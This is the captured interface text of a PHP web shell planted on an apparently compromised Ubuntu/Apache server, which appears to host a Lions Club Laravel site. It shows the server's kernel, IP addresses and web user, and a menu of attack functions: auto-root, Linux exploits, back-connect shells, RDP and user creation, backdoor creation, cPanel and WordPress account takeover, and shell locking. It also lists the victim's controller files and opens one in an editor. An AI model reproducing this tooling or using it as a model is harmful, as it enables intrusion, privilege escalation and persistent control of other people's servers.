Linux lionsclub 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 161.35.52.75 | : 3.149.245.123
Cant Read [ /etc/named.conf ]
7.4.28
www-data
shells.trxsecurity.org
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
dev /
core /
app /
Http /
Controllers /
[ HOME SHELL ]
Name
Size
Permission
Action
APIs
[ DIR ]
drwxr-xr-x
Auth
[ DIR ]
drwxr-xr-x
Dashboard
[ DIR ]
drwxr-xr-x
.DS_Store
10
KB
-rw-r--r--
Controller.php
361
B
-rw-r--r--
HomeControll1er.php
46.99
KB
-rw-r--r--
HomeController.php
53.41
KB
-rw-r--r--
LanguageController.php
525
B
-rw-r--r--
LciPagesController.php
2.9
KB
-rw-r--r--
LionsClubController2.php
3.63
KB
-rw-r--r--
LionsPagesController.php
1.73
KB
-rw-r--r--
SiteMapController.php
4.28
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : LanguageController.php
<?php namespace App\Http\Controllers; use Illuminate\Http\Request; class LanguageController extends Controller { // public function index(Request $request) { \Session::put('lang', $request->input('locale')); return redirect()->back(); } public function change($lang) { \Session::put('lang', $lang); return redirect()->route("Home"); } public function locale($lang) { \Session::put('lang', $lang); return redirect()->back(); } }
Close